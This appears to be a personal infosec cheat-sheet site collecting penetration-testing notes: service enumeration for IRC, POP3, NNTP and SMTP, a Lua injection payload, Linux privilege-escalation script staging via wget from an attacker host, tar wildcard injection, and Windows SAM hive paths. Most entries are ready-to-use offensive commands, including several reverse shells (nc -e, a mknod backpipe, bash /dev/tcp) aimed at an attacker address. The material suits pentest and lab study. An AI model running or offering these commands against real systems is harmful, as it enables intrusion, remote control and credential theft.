akde/infosec

Information security is ultimately about managing risk


  • Ver­sion 8 has an inter­est­ing vulnerability. Direc­to­ry tra­ver­sal with multiple/remote/14641.py reveals a SHA1 pass­word hash. In the pub­licly avail­able login page, the salt can be accessed and added to the hash:console.log(hex_hmac_sha1(document.loginform.salt.value, ‘2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03’));


  • Dumpzilla Extracts the con­tent of a pro­file directory. Down­load the pro­file directory. See what we have:dumpzilla 84p8ofq6.default --Summary Use the mod­ules to see details.


  • Enumeration Mandatory Enu­mer­ate with nmapnmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 6697 $target Con­nect and get ver­sion infor­ma­tiontelnet $target 6697USER duperuser4242 0 * duperuser4242NICK duperuser4242VERSIONINFOHELP Optional


  • Exam­ple: # telnet $target 110 Trying 10.10.10.51… Connected to 10.10.10.51. Escape character is '^]'. +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready USER mindy +OK PASS root +OK Welcome mindy LIST +OK 2 1945 1 1109 2 836 . RETR 1 +OK Message follows ...


  • Enumeration Mandatory Grab ban­nertelnet $target 119 Enu­mer­ate with nmapnmap -p 119 --script nntp-ntlm-info $target Optional


  • Enumeration Mandatory Grab ban­nertelnet $target 110openssl s_client -connect $target:995 -crlf -quiet In case of issues, see the openssl arti­cle. Search for exploits. If you have cre­den­tials, log in and read the emails. Optional


  • Login Bevor login, con­vert user­name and pass­word into base64. (!) Use tel­net — nc some­times does not work and does not return the server’s response! HELO mynameAUTH LOGINcm9vdAo= // username in base64334 Server reponds with base64 stringcm9vdAo= // password in base64235 ok // success


  • See SMTP article


  • Shows all process in a wide con­soleps auxww sudo = doas


  • Logro­tate exploit RCE until 12.8.1


  • Stan­dard on port 9001. Default htauth user / 123


  • https://www.syhunt.com/en/index.php?n=Articles.LuaVulnerabilities Notes A com­ment can be done with //. Add this after an injec­tionindex?file=bla');os.execute('nc...')--


  • Pre­pare the own system: cd p151.general.1 ./scripts/update_privesc_scripts.sh cd scripts/privesc/linux python -m SimpleHTTPServer 80 Pre­pare the target: cd /dev/shm wget http://$attackerip/_ex.tar tar xf _ex.tar script Now, exe­cute it: Lin­Peas: ./linpeas.sh LinEnum: ./LinEnum.sh lin­ux-smart-enu­mer­a­tion: ./lse.sh ‑l1 lin­ux-exploit-sug­gester‑2: ./linux-exploit-suggester‑2.pl sudo-killer: ./SUDO_KILLERv2.0.5.sh lin­ux­privcheck­er: ./linuxprivchecker.py Final­ly: Copy type­script file to the PentestManager!


  • Additional ideas Environment exploitation Interpolation exploitation Pre­req­ui­sites: Then, cre­ate a file in a direc­to­ry which is names like para­me­ters from the pro­gram. The pro­gram will inter­pret the file­names as arguments. Exam­ple: Assume there is a call like this in a script: tar czf /tmp/backup.tar.gz * The script is in /home/peter and because we are this…


  • If your con­sole is nar­row, widen it at the beginning: stty rows 50 cols 200 Con­sid­er to direct­ly spawn anoth­er reverse shell: nc -e /bin/sh $attackerip 4444 & Basic enu­mer­a­tion about the host idgroupscat /etc/passwdcat /etc/groupcat /etc/hostscat /etc/fstabuname -a // Check for kernel exploits // ALSO search for kernel exploits with OS name! // If this…


  • Important notes Linux nc On the own system: [rlwrap] nc -lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution] On the target: nc -e /bin/sh 10.0.3.4 4444 Alter­na­tive: mknod /tmp/backpipe p /bin/sh 0</tmp/backpipe | nc $attacker 4444 1>/tmp/backpipe Alter­na­tive: /bin/bash -c 'bash -i >& /dev/tcp/$attacker/4444 0>&1' If nc does­n’t seem on the sys­tem: Try a Perl reverse shell! Bind shell On…


  • Important notes Copy+paste For Lin­ux: base64 r > r.b64 ... base64 --decode -i r.b64 > r.tar For Win­dows: base64 p64.exe | sed 's/^(.*)$/echo \1 >> b64/g' ... certutil -encode file.exe b64.txt certutil -decode b64.txt file.exe Alter­na­tive: python -c "open('test.b64','wb').write(open('test.txt').read().encode('base64'))" ... python -c "open('test.txt','wb').write(open('test.b64').read().decode('base64'))" Alter­na­tive: python -m base64 -e test > test.b64 ... python -m base64…


  • Execution If you can­not exe­cute an exe file, try these options: Windows firewall / netsh Check fire­wall state netsh advfirewall show currentprofile netsh advfirewall show state If the fire­wall is active, list the configuration: netsh advfirewall show config Exam­ple how to add excep­tions into the fire­wall via the com­mand line from an administrator: C:\Windows\temp> netsh advfirewall firewall…


  • Grab the SAM and sys­tem file: %windir%\repair\sam %windir%\System32\config\RegBack\SAM %windir%\system32\config\SAM %windir%\repair\system %windir%\System32\config\RegBack\system %windir%\system32\config\system (Re-) Run the cre­den­tial retriev­ers from the script page.


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';